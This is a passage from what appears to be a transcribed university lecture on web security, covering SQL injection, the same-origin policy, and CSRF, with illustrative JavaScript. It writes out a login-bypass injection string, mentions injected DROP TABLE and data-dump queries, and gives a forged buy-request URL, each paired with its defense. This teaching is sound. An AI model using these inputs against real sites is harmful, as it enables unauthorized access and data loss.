01:02:51,736 --> 01:02:54,626
>> That you insert placeholders
where the variables go

1468
01:02:54,626 --> 01:02:56,496
and then you do command and
then you define the variable.

1469
01:02:56,496 --> 01:02:57,366
>> Yeah. Exactly.

1470
01:02:57,366 --> 01:02:58,826
You just insert these
placeholders.

1471
01:02:58,826 --> 01:03:01,606
So in this case I
have a placeholder %s,

1472
01:03:01,606 --> 01:03:04,576
another placeholder
%s, and that means

1473
01:03:04,576 --> 01:03:08,226
that the next two arguments
to sprintf, here's the first,

1474
01:03:08,336 --> 01:03:09,976
here's the second, are
going to be plugged

1475
01:03:09,976 --> 01:03:10,966
in for that placeholder.

1476
01:03:10,966 --> 01:03:12,756
And it just makes things
a little more readable,

1477
01:03:12,756 --> 01:03:14,576
I don't have to use the
concatenation operator,

1478
01:03:14,576 --> 01:03:15,576
the dot operator.

1479
01:03:15,836 --> 01:03:17,356
I don't have to use
the curly braces.

1480
01:03:17,356 --> 01:03:20,256
It's just one way of
constructing a SQL query

1481
01:03:20,516 --> 01:03:22,686
without just doing
it all very manually.
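The placeholder idea is not specific to PHP. As a sketch, Python's % formatting behaves much like sprintf here; the function name and the sample credentials are made up for illustration.

```python
def build_login_query(username, password):
    """Fill the two %s placeholders, in order, with the two arguments.

    No escaping is applied, which is exactly the weakness under discussion.
    """
    template = "SELECT uid FROM users WHERE username='%s' AND password='%s'"
    return template % (username, password)

print(build_login_query("jharvard", "crimson"))
# prints SELECT uid FROM users WHERE username='jharvard' AND password='crimson'
```

Whatever the user typed ends up verbatim between the single quotes, which is convenient to read but leaves the quoting entirely to chance.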

1482
01:03:22,966 --> 01:03:25,286
But there's a fundamental
problem here with my query

1483
01:03:25,286 --> 01:03:27,546
because I've obviously
not done what?

1484
01:03:28,106 --> 01:03:28,416
Axle?

1485
01:03:28,926 --> 01:03:32,066
>> You haven't escaped the
user input [inaudible] anything.

1486
01:03:32,066 --> 01:03:32,396
>> Exactly.

1487
01:03:32,396 --> 01:03:34,706
I haven't called
mysql_real_escape_string,

1488
01:03:34,706 --> 01:03:38,386
which even though it's a poorly
named function it does escape

1489
01:03:38,386 --> 01:03:39,946
potentially dangerous
characters,

1490
01:03:39,946 --> 01:03:43,356
things that might lead to
the server being tricked

1491
01:03:43,356 --> 01:03:47,496
into executing a command like
delete, or drop in the database.

1492
01:03:47,576 --> 01:03:49,116
Now, how can we see this here?

1493
01:03:49,266 --> 01:03:52,646
Well notice that the SQL
query that's being built

1494
01:03:52,646 --> 01:03:55,956
up is SELECT uid, so user
ID, or whatever that is,

1495
01:03:56,316 --> 01:04:03,676
FROM users WHERE username equals
'%s' AND password equals '%s'.

1496
01:04:03,676 --> 01:04:07,246
So what's perhaps a dangerous
character a malicious user could

1497
01:04:07,246 --> 01:04:09,546
provide when filling
out this form?

1498
01:04:09,706 --> 01:04:09,906
Jack?

1499
01:04:10,406 --> 01:04:10,836
>> Semicolon?

1500
01:04:11,346 --> 01:04:13,546
>> Semicolon, potentially
dangerous because it would seem

1501
01:04:13,546 --> 01:04:16,476
to terminate the query, or in
this case what's even worse?

1502
01:04:16,826 --> 01:04:19,906
>> You can do a single
quote to end the username --

1503
01:04:19,906 --> 01:04:22,456
yeah end the username and
then you can insert the SQL

1504
01:04:22,656 --> 01:04:24,126
in between.

1505
01:04:24,256 --> 01:04:24,756
>> Exactly.

1506
01:04:24,756 --> 01:04:27,226
In this case the semicolon is
not going to be too worrisome

1507
01:04:27,226 --> 01:04:28,846
because it's going to
be in between quotes.

1508
01:04:28,846 --> 01:04:30,426
So it's not going to
terminate the query.

1509
01:04:30,866 --> 01:04:37,686
But if I were to be like David
O'Malley, like O-'-M-A-L-L-E-Y,

1510
01:04:37,686 --> 01:04:39,726
or some Irish name
that has an apostrophe,

1511
01:04:39,726 --> 01:04:42,196
or any name that has an
apostrophe, that's going

1512
01:04:42,196 --> 01:04:44,006
to be a problem because
it's going to be

1513
01:04:44,006 --> 01:04:48,756
WHERE username equals
'O seemingly unquote

1514
01:04:49,056 --> 01:04:52,216
and then Malley and then
another quote, a third quote,

1515
01:04:52,216 --> 01:04:54,056
and now things are
just imbalanced.

1516
01:04:54,156 --> 01:04:55,196
Now that's going to break.
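The imbalance is easy to reproduce. This sketch uses Python's built-in sqlite3 module with an in-memory database as a stand-in for MySQL, which is an assumption; the table layout and function name are likewise invented for the example.

```python
import sqlite3

def try_login_query(username, password):
    """Build the query by string substitution and report whether it even parses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, username TEXT, password TEXT)")
    query = "SELECT uid FROM users WHERE username='%s' AND password='%s'" % (
        username, password)
    try:
        conn.execute(query).fetchall()
        return "ok"
    except sqlite3.OperationalError as error:
        # The stray apostrophe closes the string early and the rest fails to parse.
        return "error: %s" % error
    finally:
        conn.close()

print(try_login_query("jharvard", "crimson"))
print(try_login_query("O'Malley", "crimson"))
```

The first call parses fine; the second fails with a syntax error because the apostrophe in the name ends the quoted string after the O.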

1517
01:04:55,426 --> 01:04:57,646
So that's just going to trigger
some kind of server error,

1518
01:04:57,786 --> 01:04:59,806
but what if the bad guy
is smart enough to realize

1519
01:04:59,836 --> 01:05:02,586
that if he's going to pretend
to close one of my quotes,

1520
01:05:03,136 --> 01:05:08,156
if he's going to pretend to
close this first quote here.

1521
01:05:08,476 --> 01:05:11,586
He had better realize
that in order for this not

1522
01:05:11,586 --> 01:05:15,426
to be a syntax error, and in
order to truly trick the server

1523
01:05:15,426 --> 01:05:19,046
into executing something, he
better open a new quote later

1524
01:05:19,156 --> 01:05:21,076
that corresponds with
my second apostrophe.

1525
01:05:21,496 --> 01:05:22,596
So what do I mean by this?

1526
01:05:22,596 --> 01:05:26,126
Well let's take a look at
what a user might type in.

1527
01:05:26,896 --> 01:05:29,026
Suppose the user
-- rather, whoops.

1528
01:05:29,346 --> 01:05:32,016
Suppose the user types in this,

1529
01:05:33,366 --> 01:05:35,366
and I've deliberately
removed the bullets

1530
01:05:35,616 --> 01:05:37,556
that would normally appear
in a password field just

1531
01:05:37,556 --> 01:05:39,236
so you can see what
this bad guy has typed.

1532
01:05:39,546 --> 01:05:44,236
But what if he proclaims
his password is 12345'

1533
01:05:44,926 --> 01:05:49,606
OR '1' equals '1.

1534
01:05:50,596 --> 01:05:53,196
Now that in and of itself does
not look syntactically valid,

1535
01:05:54,076 --> 01:05:55,416
but what's the implication

1536
01:05:55,416 --> 01:05:58,126
of the bad guy having
provided this as his password?

1537
01:05:58,126 --> 01:05:58,496
Axle?

1538
01:05:58,676 --> 01:06:06,826
>> Well it's going to be
sent to the server and first

1539
01:06:06,826 --> 01:06:09,396
of all it's going to add
two quotes on either side

1540
01:06:09,396 --> 01:06:12,196
because that's what's
inside your password thing.

1541
01:06:12,196 --> 01:06:12,476
>> Good.

1542
01:06:12,746 --> 01:06:15,446
>> But then it's
going to interpret --

1543
01:06:15,446 --> 01:06:20,766
I think it's going to interpret
the 1=1 as just a valid,

1544
01:06:20,886 --> 01:06:25,716
logical statement, so it's going
to return true to the login.

1545
01:06:25,716 --> 01:06:26,466
>> Exactly.

1546
01:06:26,466 --> 01:06:28,416
So because one obviously
equals one,

1547
01:06:28,416 --> 01:06:30,416
and because the bad guy
has been smart enough

1548
01:06:30,416 --> 01:06:33,416
to construct a string that
looks weird, but if you think

1549
01:06:33,416 --> 01:06:37,186
about where it's going in my PHP
code it's going to be prefixed

1550
01:06:37,186 --> 01:06:40,706
with a single quote and
it's going to be suffixed

1551
01:06:40,706 --> 01:06:43,826
with a single quote, at which
point this actually becomes a

1552
01:06:43,826 --> 01:06:48,286
syntactically valid SQL
expression, or condition.

1553
01:06:48,286 --> 01:06:52,836
So now the fact that
he's specifically saying

1554
01:06:52,836 --> 01:06:58,856
OR '1' equals '1 that's the
real brilliant aspect here

1555
01:06:58,856 --> 01:07:03,516
because he had a hunch that I
was doing some kind of select

1556
01:07:03,516 --> 01:07:05,836
where I'm and-ing or maybe
or-ing things together.

1557
01:07:05,836 --> 01:07:09,096
But if he somehow
tricks me into executing,

1558
01:07:09,096 --> 01:07:14,466
give me uid if 1 equals 1, well
that code is indeed going

1559
01:07:14,586 --> 01:07:16,986
to return one or more uid's

1560
01:07:16,986 --> 01:07:19,206
if there are any
users in the system.

1561
01:07:19,206 --> 01:07:23,636
And presumably, like we saw

1562
01:07:23,806 --> 01:07:29,216
in our login examples
a couple weeks ago,

1563
01:07:29,216 --> 01:07:32,776
if you are using the
presence of a uid signifying

1564
01:07:33,166 --> 01:07:36,736
that a user exists and should
therefore be logged in,

1565
01:07:36,736 --> 01:07:38,626
well now the bad guy has
somehow tricked the server

1566
01:07:38,626 --> 01:07:41,456
into logging him in as who
knows who but as someone.

1567
01:07:41,456 --> 01:07:44,466
And if his goal was simply
to get into the system

1568
01:07:44,466 --> 01:07:47,386
or get WiFi access, or you
know, take someone's money,

1569
01:07:47,386 --> 01:07:49,576
now he has access to an
account on the system even

1570
01:07:49,576 --> 01:07:52,236
if he doesn't know
which uid was returned.

1571
01:07:53,196 --> 01:07:56,216
So to be clear, in red here,

1572
01:07:56,216 --> 01:07:59,916
the query that's just been
constructed would look

1573
01:07:59,916 --> 01:08:00,516
like this.

1574
01:08:00,656 --> 01:08:04,576
SELECT uid FROM users WHERE
name equals 'jharvard'

1575
01:08:04,576 --> 01:08:07,796
AND password equals '12345'
OR '1' equals '1'.

1576
01:08:07,796 --> 01:08:09,506
And unfortunately one
always equals one,

1577
01:08:09,506 --> 01:08:12,466
which means you're going to
get back a result set with one

1578
01:08:12,756 --> 01:08:16,046
or more uid's if
there are, again,

1579
01:08:16,046 --> 01:08:17,786
one or more in the database.
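
A minimal sketch of how that query ends up being built, written in JavaScript rather than the lecture's PHP. The helper name `buildLoginQuery` is hypothetical; the table and column names are the ones read out above. Because AND binds more tightly than OR in SQL, the injected condition is evaluated as (name AND password) OR '1'='1', which is true for every row.

```javascript
// Hypothetical helper: builds the login query by naive string concatenation,
// mirroring the vulnerable pattern described in the lecture.
function buildLoginQuery(username, password) {
  return "SELECT uid FROM users WHERE name='" + username +
         "' AND password='" + password + "'";
}

// What an honest user produces.
const honest = buildLoginQuery("jharvard", "12345");

// What the bad guy produces: his input closes the first quote and reopens
// one that the code's trailing apostrophe then closes.
const attack = buildLoginQuery("jharvard", "12345' OR '1'='1");

console.log(honest);
console.log(attack);
```

The second line printed is a syntactically valid query whose WHERE clause no longer depends on the password at all.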

1580
01:08:17,786 --> 01:08:19,196
So, kind of bad.

1581
01:08:19,196 --> 01:08:21,096
How do we actually fix this?

1582
01:08:21,096 --> 01:08:25,636
Irony is that it's so
simple to fix, it's annoying

1583
01:08:25,716 --> 01:08:28,006
to type but simple to fix.

1584
01:08:28,006 --> 01:08:31,466
And we can take the exact
same code in blue from before

1585
01:08:31,466 --> 01:08:35,676
and this time simply call
mysql_real_escape_string

1586
01:08:35,676 --> 01:08:39,526
on both the username field
and on the password field

1587
01:08:39,526 --> 01:08:41,606
so that now I have
the ability to specify

1588
01:08:41,606 --> 01:08:45,156
that these things should be
escaped in advance specifically

1589
01:08:46,776 --> 01:08:49,176
by calling this function
here, and this function here.

1590
01:08:49,326 --> 01:08:57,636
So, why do SQL injection attacks
nonetheless happen even though

1591
01:08:57,636 --> 01:09:02,226
it's so relatively
easy to avoid them

1592
01:09:02,226 --> 01:09:04,986
by simply escaping your input?

1593
01:09:04,986 --> 01:09:09,446
And to be clear, what does
mysql_real_escape_string do?

1594
01:09:09,446 --> 01:09:17,766
It's for things like quotes;
it puts a backslash in front

1595
01:09:17,886 --> 01:09:21,276
of them, which means
you won't be tricked

1596
01:09:21,516 --> 01:09:23,286
into executing the wrong thing.
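
To make the backslash idea concrete, here is a simplified stand-in for escaping, sketched in JavaScript rather than PHP. The function `escapeForSql` is hypothetical and handles only backslashes and quotes; the real mysql_real_escape_string also escapes a few other special characters, so treat this as an illustration and rely on the database library's own escaping or parameterized queries in real code.

```javascript
// Hypothetical, simplified escaper: puts a backslash in front of
// backslashes, single quotes, and double quotes. Illustration only.
function escapeForSql(value) {
  return String(value).replace(/[\\'"]/g, (ch) => "\\" + ch);
}

const password = "12345' OR '1'='1";

// Same concatenation as the vulnerable version, but with escaped inputs.
const query =
  "SELECT uid FROM users WHERE name='" + escapeForSql("jharvard") +
  "' AND password='" + escapeForSql(password) + "'";

console.log(query);
// SELECT uid FROM users WHERE name='jharvard' AND password='12345\' OR \'1\'=\'1'
```

With the quotes escaped, the whole input stays inside one string literal, so the OR is just part of a very odd password.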

1597
01:09:23,286 --> 01:09:27,176
So why does the world
still suffer SQL injection

1598
01:09:27,396 --> 01:09:27,856
attacks sometimes?

1599
01:09:27,856 --> 01:09:28,156
Jack?

1600
01:09:28,156 --> 01:09:29,086
>> Just errors on
the programmer.

1601
01:09:29,086 --> 01:09:29,976
Maybe he didn't put it in.

1602
01:09:30,036 --> 01:09:30,576
>> Yeah. Exactly.

1603
01:09:30,576 --> 01:09:32,926
The lack of knowledge, lack of
remembering, an attitude of oh,

1604
01:09:32,996 --> 01:09:35,486
I'll go back and escape
my inputs later,

1605
01:09:35,486 --> 01:09:36,716
which is a horrible
possible scenario,

1606
01:09:36,746 --> 01:09:37,496
to know you're doing
it wrong then

1607
01:09:37,526 --> 01:09:38,606
to claim you'll do it
later, lest you forget.

1608
01:09:38,636 --> 01:09:39,236
>> But also I don't think

1609
01:09:39,266 --> 01:09:40,436
that the login forms
are the most vulnerable

1610
01:09:40,466 --> 01:09:41,906
because I think people don't
do this in the login forms,

1611
01:09:41,936 --> 01:09:43,526
but I know of some Internet
security programs they scan the

1612
01:09:43,556 --> 01:09:44,756
entire website looking for
[inaudible] forms and the ones

1613
01:09:44,786 --> 01:09:46,076
that are usually the most
vulnerable ones are the ones

1614
01:09:46,106 --> 01:09:47,036
that say send a suggestion,
or send [inaudible].

1615
01:09:47,066 --> 01:09:47,133
>> Yeah.

1616
01:09:47,156 --> 01:09:48,386
>> The ones that were added
later on top of the site,

1617
01:09:48,416 --> 01:09:49,856
after the login was finished,
and they didn't really think

1618
01:09:49,886 --> 01:09:51,086
that that would be a
potential security threat.

1619
01:09:51,116 --> 01:09:51,356
>> That's good.

1620
01:09:51,386 --> 01:09:52,166
Yeah. It's potentially
the stupid

1621
01:09:52,196 --> 01:09:53,636
or the seemingly innocuous
forms that have nothing to do

1622
01:09:53,666 --> 01:09:55,136
with security, nothing to do
with users, but if they have

1623
01:09:55,166 --> 01:09:56,456
to do with SQL, like if
you're using SQL to insert

1624
01:09:56,486 --> 01:09:57,446
into the database
some user's feedback,

1625
01:09:57,476 --> 01:09:58,976
well the problem here is that
they can execute not just

1626
01:09:59,006 --> 01:10:00,116
OR 1 equals 1, they
could do something

1627
01:10:00,146 --> 01:10:01,226
like semicolon select
star from users

1628
01:10:01,256 --> 01:10:01,976
and dump your whole database.

1629
01:10:02,046 --> 01:10:06,726
Or worse, they can do drop
table users, or delete star

1630
01:10:06,726 --> 01:10:09,566
from user, or delete from users.

1631
01:10:09,566 --> 01:10:11,156
You can do any number of things.

1632
01:10:11,186 --> 01:10:13,576
So in fact some of the
popular press attacks

1633
01:10:13,576 --> 01:10:16,136
that you've read about,
there was one, was it Yahoo?

1634
01:10:16,356 --> 01:10:18,796
Someone's recently, I
forget, that involved a dump

1635
01:10:18,796 --> 01:10:22,606
of a SQL database, was
very likely the result

1636
01:10:22,816 --> 01:10:25,926
or was likely the result
of something like this

1637
01:10:25,926 --> 01:10:28,646
where someone injected
SQL into a script

1638
01:10:28,906 --> 01:10:30,756
that hadn't scrubbed
it properly.

1639
01:10:30,756 --> 01:10:33,546
That or someone got access
electronically to the database

1640
01:10:33,806 --> 01:10:35,816
and just kind of manually
executed these queries.

1641
01:10:35,896 --> 01:10:38,646
Both scenarios could yield
the data in question.

1642
01:10:38,646 --> 01:10:40,696
I don't think Yahoo, or
whoever it was, was very --

1643
01:10:40,696 --> 01:10:41,376
>> I think it was LinkedIn.

1644
01:10:41,486 --> 01:10:43,676
>> Oh, it was LinkedIn,
maybe that was the one.

1645
01:10:43,676 --> 01:10:46,086
I don't think they were very
forthcoming with their details.

1646
01:10:46,406 --> 01:10:47,466
But the fact too that one

1647
01:10:47,466 --> 01:10:49,836
of them actually had clear
text passwords I think.

1648
01:10:50,366 --> 01:10:51,906
That was idiotic,
whoever that was.

1649
01:10:52,046 --> 01:10:53,146
That was just not necessary.

1650
01:10:53,436 --> 01:10:54,156
Right? That was like, what?

1651
01:10:54,156 --> 01:10:55,126
Lecture three or something?

1652
01:10:55,126 --> 01:10:56,566
So, all right.

1653
01:10:56,976 --> 01:11:01,956
Anyhow. So what more is
there to fear out there?

1654
01:11:01,956 --> 01:11:05,236
Oh, and to be clear in green
here this is what the bad guy

1655
01:11:05,236 --> 01:11:08,626
would experience if you actually
called mysql_real_escape_string.

1656
01:11:08,626 --> 01:11:12,406
Looks stupid but it's
no longer tricking you

1657
01:11:12,476 --> 01:11:15,826
into evaluating something
as a 1 equals 1 expression.

1658
01:11:16,036 --> 01:11:19,996
Now it says give me the user ID
where the username is jharvard

1659
01:11:19,996 --> 01:11:26,286
and the password is literally
12345' OR and so forth.

1660
01:11:26,626 --> 01:11:28,126
Which is not likely
someone's password.

1661
01:11:28,566 --> 01:11:32,056
And even if it is it's probably
John Harvard who's trying

1662
01:11:32,056 --> 01:11:32,816
to log in with that.

1663
01:11:33,776 --> 01:11:34,146
All right.

1664
01:11:34,356 --> 01:11:37,466
So same-origin policy, and
its relation here to security.

1665
01:11:37,466 --> 01:11:41,646
So we talked briefly about
this on Monday in what context?

1666
01:11:42,256 --> 01:11:44,836
There's a same-origin policy
that, long story short,

1667
01:11:45,186 --> 01:11:48,636
essentially says what?

1668
01:11:49,206 --> 01:11:49,366
Axle?

1669
01:11:51,556 --> 01:11:54,456
>> Well, I encountered
it when I tried

1670
01:11:54,456 --> 01:11:55,846
to get some [inaudible]
data from the [inaudible].

1671
01:11:55,846 --> 01:12:00,606
They wouldn't allow me because
I wasn't on the same server.

1672
01:12:00,906 --> 01:12:01,656
>> Good.

1673
01:12:01,946 --> 01:12:04,636
>> So what I had to do --
well, you can go around it,

1674
01:12:05,006 --> 01:12:06,686
you can just do a PHP
[inaudible] contents

1675
01:12:06,846 --> 01:12:09,416
and then echo [inaudible] HTML,
but you would essentially,

1676
01:12:09,416 --> 01:12:12,336
the policy constitutes
that you have to be

1677
01:12:12,376 --> 01:12:16,266
on the same server
[inaudible] database.

1678
01:12:16,326 --> 01:12:16,746
>> Exactly.

1679
01:12:16,746 --> 01:12:18,246
Browser behavior is
governed generally

1680
01:12:18,246 --> 01:12:20,696
by the same origin policy
which is really relevant

1681
01:12:20,696 --> 01:12:23,006
for us most recently
in the context of Ajax.

1682
01:12:23,326 --> 01:12:26,076
Which allows us of course to
get more data from a server

1683
01:12:26,076 --> 01:12:28,096
and incorporate it
into the existing DOM.

1684
01:12:28,436 --> 01:12:31,006
Problem is the same origin
policy tells browsers

1685
01:12:31,046 --> 01:12:34,506
that you can make Ajax
requests to other servers

1686
01:12:34,736 --> 01:12:39,066
but you cannot integrate their
response into the current DOM

1687
01:12:39,066 --> 01:12:42,616
because it's not from the same
origin as the original DOM,

1688
01:12:42,616 --> 01:12:44,646
the original HTML file
that was downloaded.

1689
01:12:44,936 --> 01:12:46,426
So there's a couple
workarounds for this.

1690
01:12:46,426 --> 01:12:49,326
One, the person who owns the
server, Yahoo in that case,

1691
01:12:49,616 --> 01:12:53,536
could start sending certain HTTP
headers, called cors headers,

1692
01:12:53,536 --> 01:12:57,176
C-O-R-S, that essentially
tell browsers it's okay

1693
01:12:57,176 --> 01:13:00,226
to let people incorporate our
data into their existing DOMs.

1694
01:13:00,546 --> 01:13:02,846
Most websites don't enable
that, and you can do it

1695
01:13:02,846 --> 01:13:04,306
if you run the server,
you can't do it

1696
01:13:04,306 --> 01:13:06,366
if obviously you're
trying to use Yahoo.
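
As a rough sketch of what "sending CORS headers" means on the server side, the JavaScript below decides which response headers to attach for a given requesting origin. `Access-Control-Allow-Origin` is the actual CORS header name; the function `corsHeaders` and the allow-list contents are assumptions made up for illustration.

```javascript
// Hypothetical allow-list of origins that may read this server's responses.
const ALLOWED_ORIGINS = new Set(["http://project2.domain.tld"]);

// Returns the extra response headers for a request whose Origin header
// is requestOrigin. Unknown origins get no CORS headers, so the browser
// keeps enforcing the same-origin policy for them.
function corsHeaders(requestOrigin) {
  if (ALLOWED_ORIGINS.has(requestOrigin)) {
    return {
      "Access-Control-Allow-Origin": requestOrigin,
      // Tell caches that the response varies with the Origin header.
      "Vary": "Origin",
    };
  }
  return {};
}

console.log(corsHeaders("http://project2.domain.tld"));
console.log(corsHeaders("http://evil.example"));
```

Only the party running the server can add these headers, which is why this workaround is not available when the data lives on someone else's site.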

1697
01:13:06,676 --> 01:13:08,266
Alternatively you
can write a proxy,

1698
01:13:08,266 --> 01:13:10,366
a little PHP script that's
maybe one or two lines

1699
01:13:10,366 --> 01:13:12,616
that makes the request for
you, but that PHP script

1700
01:13:12,616 --> 01:13:14,056
at least lives in
the same origin

1701
01:13:14,406 --> 01:13:16,376
as your JavaScript file,
so that might help.

1702
01:13:16,556 --> 01:13:21,036
You can use a third party proxy
service like Yahoo's YQL service

1703
01:13:21,086 --> 01:13:24,136
that I mentioned last time,
which will allow you to go

1704
01:13:24,136 --> 01:13:27,456
to some other server and
sends it back to you in a way

1705
01:13:27,456 --> 01:13:28,876
that you can incorporate it back

1706
01:13:28,876 --> 01:13:30,476
into your own DOM,
which is nice.

1707
01:13:30,816 --> 01:13:34,456
Or you can use something called
JSONP, called padded JSON,

1708
01:13:34,766 --> 01:13:39,046
which essentially uses some
interesting script tag hacks

1709
01:13:39,506 --> 01:13:44,306
so that you can grab data from
a server and you tell the server

1710
01:13:44,306 --> 01:13:47,986
in advance what function
you want to be called

1711
01:13:48,666 --> 01:13:49,996
when the data comes back.

1712
01:13:50,376 --> 01:13:54,336
And if the server cooperates
then you can trick the server,

1713
01:13:54,336 --> 01:13:56,066
rather, it's not so much
a trick in that case.

1714
01:13:56,546 --> 01:14:01,086
You can incorporate data into
your DOM by using a server

1715
01:14:01,086 --> 01:14:03,646
that supports, again,
JSONP, padded JSON.

1716
01:14:03,646 --> 01:14:05,626
But many websites
don't support that;

1717
01:14:05,626 --> 01:14:08,346
they'll support just
JSON or XML, or the like.
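
A small sketch of the server's half of JSONP, in JavaScript. The page names a callback function in its request, and a cooperating server wraps the JSON in a call to that function so the response runs as a script. The function name `jsonpResponse` and the callback name `handleQuote` are hypothetical.

```javascript
// Wraps data in a call to the callback the client asked for.
// Only plain identifier-like callback names are accepted, so the
// parameter cannot be used to smuggle arbitrary script into the response.
function jsonpResponse(callbackName, data) {
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(callbackName)) {
    throw new Error("invalid callback name");
  }
  return callbackName + "(" + JSON.stringify(data) + ");";
}

console.log(jsonpResponse("handleQuote", { symbol: "INFX.PK" }));
// handleQuote({"symbol":"INFX.PK"});
```

The requesting page would define `handleQuote` itself and load the server's URL through a script tag, which the same-origin policy does not block.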

1718
01:14:08,346 --> 01:14:09,866
So in short, number
of workarounds

1719
01:14:10,386 --> 01:14:12,276
but a pain nonetheless.

1720
01:14:12,926 --> 01:14:15,956
Oh, and this affects everything,
windows, frames, objects,

1721
01:14:16,256 --> 01:14:18,366
Ajax requests, and
it's the Ajax ones

1722
01:14:18,366 --> 01:14:20,566
that are the most
current for us.

1723
01:14:20,566 --> 01:14:22,486
All right, so a couple

1724
01:14:22,486 --> 01:14:24,456
of remaining attacks
to be mindful of.

1725
01:14:24,456 --> 01:14:26,076
Things that you might
not have even appreciated

1726
01:14:26,076 --> 01:14:28,376
as you've made your
HTML based websites

1727
01:14:28,376 --> 01:14:30,366
or more recently
your PHP websites,

1728
01:14:30,366 --> 01:14:32,126
or now your JavaScript
based websites.

1729
01:14:32,456 --> 01:14:34,026
Cross-Site Request Forgeries,

1730
01:14:34,406 --> 01:14:36,106
which has an acronym
I rarely remember,

1731
01:14:36,246 --> 01:14:39,166
and Cross-Site Scripting
attacks, XSS.

1732
01:14:39,436 --> 01:14:41,946
So what are the two and
what should you fear?

1733
01:14:41,946 --> 01:14:43,226
So here's the story here.

1734
01:14:44,016 --> 01:14:47,976
You log into something like
project2 and suppose it lives

1735
01:14:47,976 --> 01:14:49,576
in some domain name on the web.

1736
01:14:49,576 --> 01:14:51,606
So domain.tld, top level domain.

1737
01:14:52,166 --> 01:14:54,936
So you log into
project2.domain.tld.

1738
01:14:54,936 --> 01:14:58,146
You then visit a bad guy's
site and the bad guy has a link

1739
01:14:58,526 --> 01:15:01,896
to this URL here,
http://project2.domain.

1740
01:15:02,026 --> 01:15:04,186
tld/buy.php?

1741
01:15:04,256 --> 01:15:06,996
symbol=INFX.PK.

1742
01:15:08,116 --> 01:15:11,246
You unwittingly buy
the penny stock.

1743
01:15:11,466 --> 01:15:12,926
What's going on here?

1744
01:15:12,926 --> 01:15:17,676
So this is assuming something
like CS75 finance in this case,

1745
01:15:17,896 --> 01:15:20,596
although, actually, two would
have been the [inaudible].

1746
01:15:21,046 --> 01:15:23,286
So if it's project1, this
would have been something

1747
01:15:23,316 --> 01:15:28,656
like CS75 finance, and
it seems to be proposing

1748
01:15:28,656 --> 01:15:31,876
that this bad guy has a
link that just so happens

1749
01:15:31,926 --> 01:15:36,256
to be leading back to your
domain, but he has it there

1750
01:15:36,256 --> 01:15:37,686
because he just likes
tricking people

1751
01:15:37,686 --> 01:15:38,926
into buying his penny stock.

1752
01:15:39,216 --> 01:15:40,986
And that's advantageous
for him, the bad guy,

1753
01:15:40,986 --> 01:15:42,446
because the more people
that buy the penny stock,

1754
01:15:42,446 --> 01:15:44,456
the more it drives the price
up, then he can sell and screw

1755
01:15:44,456 --> 01:15:47,366
over all these people, so a
reasonable attack scenario.

1756
01:15:48,066 --> 01:15:51,626
So how is this working,
or what's the flaw

1757
01:15:51,626 --> 01:15:54,266
in your website,
project2.domain.tld?

1758
01:15:54,266 --> 01:15:54,406
Jack?

1759
01:15:55,516 --> 01:16:03,286
[ Inaudible Speaker ]

1760
01:16:03,786 --> 01:16:03,976
Good.

1761
01:16:04,516 --> 01:16:26,546
[ Inaudible Speaker ]

1762
01:16:27,046 --> 01:16:27,626
Perfect, right?

1763
01:16:27,626 --> 01:16:30,736
It's not that hard to figure
out how a website works;

1764
01:16:30,736 --> 01:16:32,316
you can just use
Chrome's Inspector.

1765
01:16:32,316 --> 01:16:33,886
Anyone who's taken this
class, like, has --

1766
01:16:33,986 --> 01:16:36,216
is savvy enough to start
poking around, and just figure

1767
01:16:36,216 --> 01:16:38,766
out how almost every
mechanism of a website works,

1768
01:16:38,996 --> 01:16:41,246
unless things -- like,
JavaScript [inaudible]

1769
01:16:41,246 --> 01:16:42,436
which just makes it harder.

1770
01:16:42,686 --> 01:16:44,076
But at the end of the day
you can certainly figure

1771
01:16:44,076 --> 01:16:45,826
out what HTTP parameters
are being used

1772
01:16:45,826 --> 01:16:47,836
by just watching the
traffic in your own browser

1773
01:16:47,836 --> 01:16:48,926
or some other debugging tool.

1774
01:16:49,256 --> 01:16:51,476
And if you made the conscious
decision as the designer

1775
01:16:51,476 --> 01:16:54,046
of this website to
have a buy.php file,

1776
01:16:54,046 --> 01:16:57,026
which that's reasonable, and it
takes a parameter called symbol,

1777
01:16:57,266 --> 01:16:59,686
and a stock symbol as its value,

1778
01:16:59,686 --> 01:17:00,966
and that buys one
share [inaudible]

1779
01:17:01,186 --> 01:17:02,536
or something like that.

1780
01:17:02,926 --> 01:17:05,156
Well, you have made
a mistake here

1781
01:17:05,156 --> 01:17:07,946
because you've made it
super easy for a user

1782
01:17:08,176 --> 01:17:10,666
to similarly construct a
URL that looks like this.

1783
01:17:10,666 --> 01:17:12,826
And the bad guy might not
even put it in his website,

1784
01:17:13,066 --> 01:17:16,036
what if he just sends a
million spams and tells people

1785
01:17:16,036 --> 01:17:18,366
in that spam email to
click this link, right?

1786
01:17:18,366 --> 01:17:19,716
He's going to get
some small percentage

1787
01:17:19,716 --> 01:17:22,906
of people actually clicking the
link, who if they also happen

1788
01:17:22,906 --> 01:17:25,956
to be users of your website,
have just been tricked

1789
01:17:25,956 --> 01:17:27,096
into buying that stock.

1790
01:17:27,256 --> 01:17:29,536
Now obviously this is kind of
a silly name for a website,

1791
01:17:29,536 --> 01:17:32,596
but what if the URL is actually
etrade.com, or something

1792
01:17:32,596 --> 01:17:34,736
like that, and you've
been logged in recently

1793
01:17:34,736 --> 01:17:37,346
to your E-Trade account and
they have implemented their

1794
01:17:37,466 --> 01:17:39,986
[inaudible] parameters in
this way, you can trick them

1795
01:17:39,986 --> 01:17:41,316
into buying the penny stock.

1796
01:17:41,766 --> 01:17:42,556
So what's a defense?

1797
01:17:42,556 --> 01:17:44,696
So Jack proposed,
like, a random number.

1798
01:17:44,696 --> 01:17:45,706
Can you elaborate, Jack?

1799
01:17:46,516 --> 01:17:57,686
[ Inaudible Speaker ]

1800
01:17:58,186 --> 01:17:58,416
Good.

1801
01:17:59,396 --> 01:18:01,396
[ Inaudible Speaker ]

1802
01:18:01,776 --> 01:18:05,446
Good. So you can have the web
server, etrade.com for instance,

1803
01:18:05,706 --> 01:18:07,806
generating some kind
of random token

1804
01:18:07,806 --> 01:18:12,456
that it requires be
in the actual buy.

1805
01:18:12,716 --> 01:18:15,816
And the motivation here is
that if the server uses cookies

1806
01:18:15,816 --> 01:18:19,596
or sessions to remember that
I gave Jack this random ID

1807
01:18:19,596 --> 01:18:22,786
for subsequent purchases,
now the bad guy has

1808
01:18:22,836 --> 01:18:25,586
to not only know the format
of the URL, he also has to get

1809
01:18:25,586 --> 01:18:28,676
so damn lucky as
to also hard code

1810
